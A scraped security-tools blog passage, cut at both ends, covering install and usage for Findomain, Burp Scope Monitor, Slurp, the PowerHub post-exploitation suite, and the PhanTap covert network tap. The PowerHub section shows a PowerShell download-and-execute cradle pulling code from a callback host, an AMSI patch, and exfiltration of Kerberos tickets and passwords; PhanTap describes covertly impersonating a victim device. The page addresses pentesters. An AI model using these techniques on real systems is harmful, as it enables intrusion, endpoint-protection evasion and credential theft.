<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ chmod +x findomain-linux</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ ./findomain-linux</span><br />
<br />
<b>If you are using the BlackArch Linux distribution, you just need to use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ sudo pacman -S findomain</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation ARM</span></h3>
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ chmod +x findomain-arm</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ ./findomain-arm</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation Aarch64 (Raspberry Pi)</span></h3>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ chmod +x findomain-aarch64</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">$ ./findomain-aarch64</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation Windows</span></h3>
<b>Download the binary from </b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe</span><br />
<br />
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.<br />
<br />
Exec: findomain-windows in the CMD shell.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation MacOS</span></h3>
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ chmod +x findomain-osx.dms</span><br />
<span style="background-color: #f3f3f3; color: #073763; font-family: "courier new", courier, monospace;">$ ./findomain-osx.dms</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain 0.2.0</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">Eduard Tolosa <tolosaeduard@gmail.com></span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">A tool that use Certificates Transparency logs to find subdomains.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">USAGE:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> findomain [FLAGS] [OPTIONS]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">FLAGS:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -a, --all-apis Use all the available APIs to perform the search. It take more time but you will have a lot of</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> more results.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -h, --help Prints help information</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -i, --get-ip Return the subdomain list with IP address if resolved.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -V, --version Prints version information</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">OPTIONS:</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -f, --file <file> Sets the input file to use.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -o, --output <output> Write data to output file in the specified format. [possible values: txt, csv, json]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -p, --proxy <proxy> Use a proxy to make the requests to the APIs.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"> -t, --target <target> Target host</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Examples</span></h3>
<b>Make a simple search of subdomains and print the info in the screen:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com</span><br />
<br />
<b>Make a simple search of subdomains using all the APIs and print the info in the screen:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -a</span><br />
<br />
<b>Make a search of subdomains and export the data to a CSV file:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -o csv</span><br />
<br />
<b>Make a search of subdomains using all the APIs and export the data to a CSV file:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -a -o csv</span><br />
<br />
<b>Make a search of subdomains and resolve the IP address of subdomains (if possible):</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -i</span><br />
<br />
<b>Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -i -a</span><br />
<br />
<b>Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -i -a -o csv</span><br />
<br />
<b>Make a search of subdomains using a proxy (http://127.0.0.1:8080 in it case, the rest of aguments continue working in the same way, you just need to add the -p flag to the before commands):</b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new", courier, monospace;">findomain -t example.com -p http://127.0.0.1:8080</span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/Edu4rdSHL/findomain" target="_blank">Download FinDomain</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-58783037324271276752019-08-21T17:15:00.001+05:302019-08-21T17:15:35.383+05:30Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTckI2CxGVLzPKMSwcA2ZOBhaHSj02I_rGlaCyMrgjMKk9WW7RYzZTqMX-jkRmo4PzzeRoeLS44RfgPtyqBYE4zDgIUsSo104p_q5Ttq-jj_KeEQFMWKBOx3uxP_mF2hgKXSLk9Z1H2Lg1/s1600/Burp+Scope+Monitor+Extension.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="649" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTckI2CxGVLzPKMSwcA2ZOBhaHSj02I_rGlaCyMrgjMKk9WW7RYzZTqMX-jkRmo4PzzeRoeLS44RfgPtyqBYE4zDgIUsSo104p_q5Ttq-jj_KeEQFMWKBOx3uxP_mF2hgKXSLk9Z1H2Lg1/s1600/Burp+Scope+Monitor+Extension.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Burp Scope Monitor Extension</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">A Burp Suite Extension to monitor and keep track of tested endpoints.</span></h3>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Main Features</span></h3>
<br />
<ul style="text-align: left;">
<li>Simple, easy way to keep track of unique endpoints when testing an application</li>
<li>Mark individual endpoints as analyzed or not</li>
<li>Instantly understand when a new endpoint, not tested is requested</li>
<li>Accessible from Proxy tab (right click, mark request as analyzed/not)</li>
<li>Send to Repeater</li>
<li>Enforcement of Burp's in scope rules</li>
<li>Import/Export state file directly to a CSV file for</li>
<li>Autosave option</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt7qG9zpblFR2vmNXmCniz-kKVgvvLNTQgRPQI_fRRj_sk9kr_hjbD-dcy17fyUBj7gGwN9EuvOyRWbrlz0mEZx995lyHkvljz7_9XntOp36ufgjxuCqyIzmRI8_ov4n7BmMyKA7BRjPX/s1600/Burp+Scope+Monitor+Extension.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="794" data-original-width="1438" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt7qG9zpblFR2vmNXmCniz-kKVgvvLNTQgRPQI_fRRj_sk9kr_hjbD-dcy17fyUBj7gGwN9EuvOyRWbrlz0mEZx995lyHkvljz7_9XntOp36ufgjxuCqyIzmRI8_ov4n7BmMyKA7BRjPX/s640/Burp+Scope+Monitor+Extension.gif" width="640" /></a></div>
<div>
<br /></div>
<br />
<h3 style="text-align: left;">
Installation</h3>
<br />
<ol style="text-align: left;">
<li>Make sure you have Jython configured under <b>Extender -> Options -> Python Environment. </b>For further instructions, check PortSwigger official instructions at their support page.</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: Courier New, Courier, monospace;">git clone git@github.com:Regala/burp-scope-monitor.git</span></li>
<li>Import <span style="background-color: #f3f3f3; color: #274e13; font-family: Courier New, Courier, monospace;">main.py</span> in Extender - <b>Extender -> Extensions -> Add -> Select Python -> Select main.py</b></li>
</ol>
<br />
<br />
<h3 style="text-align: left;">
Documentation</h3>
Most of the options available in General or Import tabs are auto-explanatory.<br />
<br />
<br />
<ul style="text-align: left;">
<li>"Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.</li>
<li>"Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.</li>
<li>"Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.</li>
<li>"Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).</li>
</ul>
<br />
<h3 style="text-align: left;">
Future Development</h3>
<br />
<ul style="text-align: left;">
<li>Keep track of parameters observed in all requests</li>
<li>Highlight when a new parameter was used in an already observed/analyzed endpoint</li>
<li>Export to spreadsheet / Google Sheets</li>
<li>Adding notes to the endpoint</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Implementation</span></h3>
The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.<br />
<br />
To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.<br />
<br />
You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.<br />
<br />
Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/Regala/burp-scope-monitor" target="_blank">Download Burp Scope Monitor </a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-32687818520760302392019-08-08T03:17:00.001+05:302019-08-08T03:18:30.647+05:30Slurp- To Security Audits of S3 Buckets Enumerator<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAtOFAr9yXeqBcjq83KlgyCzlvQAF4hKLXkgSHRCtzLzYoEx6-9z_XnPuUR8Fl6iea1fEFafXSupbZzKMVnZFxVT2wFXs3iqazZyynI9IU_RX5Q-_XdVACYjhKN4W2KYpb7YMHBS97syb0/s1600/Slurp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="662" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAtOFAr9yXeqBcjq83KlgyCzlvQAF4hKLXkgSHRCtzLzYoEx6-9z_XnPuUR8Fl6iea1fEFafXSupbZzKMVnZFxVT2wFXs3iqazZyynI9IU_RX5Q-_XdVACYjhKN4W2KYpb7YMHBS97syb0/s1600/Slurp.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Slurp- Blackbox/Whitebox S3 Bucket Enumerator</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">To Evaluate the security of S3 buckets</span></h3>
<div>
<span style="color: #073763;"><br /></span></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Overview</span></h3>
<ul style="text-align: left;">
<li>Credit to all the vendor packages to develop Slurp possible.</li>
<li>Slurp is for pen-testers and security professionals to perform audits of s3 buckets.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features</span></h3>
<ul style="text-align: left;">
<li>Scan via domain(s); you can target a single domain or a list of domains</li>
<li>Scan via keyword(s); you can target a single keyword or a list of keywords</li>
<li>Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed</li>
<li>Colorized output for visual grep</li>
<li>Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)</li>
<li>Punycode support for internationalized domains</li>
<li>Strong copyleft license (GPLv3)</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Modes</span></h3>
There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Blackbox (external)</span></h3>
In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.<br />
<br />
<b>Domain</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySSmj7MDV812WxvczpU91g8iy_T4SJjRrSnQayYgtH7MhnnMEmAaCT_TQmx_-_e1tK_A7CRJxhEDNsi_mBFvwKGMylAJmv5I05an789pxTZekJCg6jYkA_TzsyMysUX3l99HhyFAHmwGU/s1600/Slurp+domain+Testing.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="193" data-original-width="776" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgySSmj7MDV812WxvczpU91g8iy_T4SJjRrSnQayYgtH7MhnnMEmAaCT_TQmx_-_e1tK_A7CRJxhEDNsi_mBFvwKGMylAJmv5I05an789pxTZekJCg6jYkA_TzsyMysUX3l99HhyFAHmwGU/s640/Slurp+domain+Testing.png" width="640" /></a></div>
<br />
<b>Keywords</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfmUGhRrIOpmnL98EUfkaJFiHYWtl9oSKbIIWyNNTxhMuZT-HIHTYTSxjU018yFGoLO8_m7b8F0r5jSg5iSPOcCbANU0wIfbtyclwT-8hBR6Ghrlp6CyHd25rBiMcNmX1moPtcxusGjstL/s1600/Slurp+keywords.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="326" data-original-width="731" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfmUGhRrIOpmnL98EUfkaJFiHYWtl9oSKbIIWyNNTxhMuZT-HIHTYTSxjU018yFGoLO8_m7b8F0r5jSg5iSPOcCbANU0wIfbtyclwT-8hBR6Ghrlp6CyHd25rBiMcNmX1moPtcxusGjstL/s1600/Slurp+keywords.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Whitebox (internal)</span></h3>
In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.<br />
<br />
Your credentials should be in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><b>~/.aws/credentials</b></span>.<br />
<br />
<b>Internal</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcB38eisadbyU3VrTM5DdUsy7oa4zscpGzpp7wIES1Y_Gug0V7a8Mj-SEceDm0Lv0G3nAE7HVJXVaHgBgbrI7n04kXGgiTs3402nHMVQVQrsUMJrPoo8flWLtAd2fHwcXzs_J8-AJCe4ha/s1600/Slurp+internal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="150" data-original-width="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcB38eisadbyU3VrTM5DdUsy7oa4zscpGzpp7wIES1Y_Gug0V7a8Mj-SEceDm0Lv0G3nAE7HVJXVaHgBgbrI7n04kXGgiTs3402nHMVQVQrsUMJrPoo8flWLtAd2fHwcXzs_J8-AJCe4ha/s1600/Slurp+internal.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">slurp domain <-t|--target> example.com </span>will enumerate the S3 domains for a specific target.</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">slurp keyword <-t|--target> linux,golang,python</span> will enumerate S3 buckets based on those 3 key words.</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">slurp internal</span> performs an internal scan using the AWS API.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
This project uses <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">vgo;</span> you can clone and <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">go build</span> or download from Releases section.<br />
<br />
Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the <a href="https://golang.org/ref/spec" target="_blank">go spec</a>.<br />
<br />
Also, the only binaries I'm including are <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">linux/amd64;</span> if you want mac/windows binaries, build it yourself.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/hehnope/slurp" target="_blank">Download Slurp</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-1353788923935045622019-08-08T02:45:00.000+05:302019-08-08T02:48:46.240+05:30PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnc0Mu7BHfI-k-6OkXkZMdDl1AS8aDuOFU4CYkEgmTNERIcvyG7x9TpwmrrYnJymrpLht28TgPdXXXnIDNM0cjRb1qTlZEhCPVVbBPeObnqSmvswrs5dmOC7QLcjpuvNFvNoJJ_pYV_bW/s1600/PowerHub.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="661" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnc0Mu7BHfI-k-6OkXkZMdDl1AS8aDuOFU4CYkEgmTNERIcvyG7x9TpwmrrYnJymrpLht28TgPdXXXnIDNM0cjRb1qTlZEhCPVVbBPeObnqSmvswrs5dmOC7QLcjpuvNFvNoJJ_pYV_bW/s1600/PowerHub.png" /></a></div>
<h2 style="text-align: left;">
</h2>
<h2 style="text-align: left;">
<span style="color: #073763;">PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.</span></h3>
<br />
During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.<br />
<br />
PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.<br />
<br />
Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.<br />
<br />
On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.<br />
<br />
Here is a simple example (grab information about local groups with PowerView and transfer it back):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> _____ _____ _ _ _ _______ ______ _ _ _ _ ______</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> |_____] | | | | | |______ |_____/ |_____| | | |_____]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> | |_____| |__|__| |______ | \_ | | |_____| |_____]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> written by Adrian Vollmer, 2018-2019</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Run 'Help-PowerHub' for help</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">AmsiScanBuffer patch has been applied.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">0</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">PS C:\Users\avollmer> lhm powerview</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtjjfmepsOxZTCV6WkUg9CCOL2Wp98YOj9E_dIRs00mRnO2JCdo7PaYG2XsbSzlPJ_xgX1cpdIROvl5MgK_eP3ixuWtHgUDYkqC35iKrp0cMtpzadz5vegYeUAl7l8wF0N6fpDXcE8uyz/s1600/PowerHub+Inaction.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="901" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtjjfmepsOxZTCV6WkUg9CCOL2Wp98YOj9E_dIRs00mRnO2JCdo7PaYG2XsbSzlPJ_xgX1cpdIROvl5MgK_eP3ixuWtHgUDYkqC35iKrp0cMtpzadz5vegYeUAl7l8wF0N6fpDXcE8uyz/s640/PowerHub+Inaction.png" width="640" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
PowerHub itself does not need to be installed. Just execute <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">powerhub.py</span>. However, there are a few dependencies. They are listed in the <a href="https://github.com/AdrianVollmer/PowerHub/blob/master/requirements.txt" target="_blank">requirements.txt</a>. Install them either via <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip3 install --user -r requirements.txt</span> or use a virtual environment:<br />
<br />
Run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python3 -m venv env</span> to create a virtual environment, then use source env/bin/activate to activate it. Now run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip3 install -r requirements.txt</span> to install the depencendies inside the virtual environment.<br />
<br />
<b>Python2 is not supported.</b><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">--auth <user>:<pass></span>, otherwise, a randomly generated password will be used for basic authentication.<br />
<br />
The switch <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">--no-auth</span> disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.<br />
<br />
Read <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./powerhub.py --help</span> and the <a href="https://github.com/AdrianVollmer/PowerHub/wiki/Usage" target="_blank">Wiki</a> for details.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/AdrianVollmer/PowerHub/" target="_blank">Download PowerHub</a></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8244923499446330076.post-49158964374369658372019-08-08T02:17:00.001+05:302023-06-15T14:46:52.752+05:30Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxwqzMdPRRMwPPFSwvc6onlEj1jnCxBLMGZJykgI8T0YCQVsYL6zmqA6sBwlmHfu5f1QqV7GdsWvCrO00HrlsWJmW0rQUTXFR2pz-pWtqXURDXIfCHzxwHLEZ9N03hu88-6kPAOSAkYXD/s1600/PhanTap.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="659" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxwqzMdPRRMwPPFSwvc6onlEj1jnCxBLMGZJykgI8T0YCQVsYL6zmqA6sBwlmHfu5f1QqV7GdsWvCrO00HrlsWJmW0rQUTXFR2pz-pWtqXURDXIfCHzxwHLEZ9N03hu88-6kPAOSAkYXD/s1600/PhanTap.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;"><br /></span></h2>
<h2 style="text-align: left;">
<span style="color: #073763;">Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.</span></h2>
<span style="color: #073763;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.</span></h3>
<br />
PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.<br />
<br />
It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the <a href="https://www.gl-inet.com/products/gl-ar150/" target="_blank">GL.iNet GL-AR150</a>.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features:</span></h3>
<ul style="text-align: left;">
<li>Transparent network bridge.</li>
<li>Silent : No ARP, multicast, broadcast.</li>
<li>802.1x passthrough.</li>
<li>Automatic configuration:</li>
</ul>
Capture traffic exiting the network (the destination is non RFC1918), source IP and MAC is our victim, destination MAC is our gateway,<br />
SNAT bridge traffic to the victim MAC and IP address,<br />
set the router default gateway to the MAC of the gateway detected just before.<br />
<br />
<ul style="text-align: left;">
<li>Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.</li>
<li>Learns the DNS server from traffic and modifies the one on the router so that it's the same.</li>
<li>Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.</li>
<li>Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.</li>
<li>You can talk to the victim machine (using the gateway IP).</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Setup</span></h3>
PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).<br />
<br />
If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.<br />
<ul style="text-align: left;">
<li>Install a snapshot build, for the <a href="https://downloads.openwrt.org/snapshots/targets/ath79/generic/openwrt-ath79-generic-glinet_gl-ar150-squashfs-sysupgrade.bin" target="_blank">GL.iNet GL-AR150</a></li>
<li>Update the OpenWrt package list</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">opkg update</span><br />
